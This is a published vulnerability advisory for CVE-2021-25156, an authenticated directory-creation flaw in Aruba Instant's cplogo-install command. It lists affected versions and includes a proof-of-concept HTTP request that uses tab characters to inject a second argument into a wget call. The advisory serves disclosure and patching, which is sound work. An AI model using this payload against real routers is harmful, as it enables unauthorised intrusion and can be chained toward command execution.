Authenticated Arbitrary Directory Create via Web UI (cplogo-install)

Aleph Research Advisory

Identifier

CVE-2021-25156

Severity

Moderate

Product

Aruba Instant

Vulnerable Versions

- Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below
- Aruba Instant 6.5.x: 6.5.4.18 and below
- Aruba Instant 8.3.x: 8.3.0.14 and below
- Aruba Instant 8.5.x: 8.5.0.11 and below
- Aruba Instant 8.6.x: 8.6.0.6 and below
- Aruba Instant 8.7.x: 8.7.1.0 and below

Technical Details

An authenticated attacker can create a directory at arbitrary path. The issue is within the handler for the cplogo-install CLI command. The handler for the command will not filter %09(tab) characters from the param, which can cause parameter injection into wget call.

An attacker can chain this with other vulnerabilities to run arbitrary commands on the router.

POC:

POST /swarm.cgi HTTP/1.1
Host: IP:4343
.......
.......
Cookie: sid=XXXXXXXXXXXXXXXXXXXX; login=undefined; password=undefined; userType=admin
 
opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20"https:// IP:4343/backup.cfg%09--directory-prefix%09/tmp/oper_/%09#"'&refresh=false&sid=XXXXXXXXXXXXXXXXXXXX&nocache=0.23759201691110987&=&=

Timeline

09-Mar-21
: Public disclosure.
09-Mar-21
: Patch available.
03-Feb-21
: CVE-2021-25156 assigned.
22-Nov-20
: Reported.

Posts

Aruba in Chains: Chaining Vulnerabilities for Fun and Profit
By Itai Greenhut & Gal Zror,
15-Jul 2021

Credit

Itai Greenhut (@Gr33nh4t) of Aleph Research, HCL Technologies
Gal Zror (@waveburst) of Aleph Research, HCL Technologies

External References

Aruba Instant (IAP) Multiple Vulnerabilities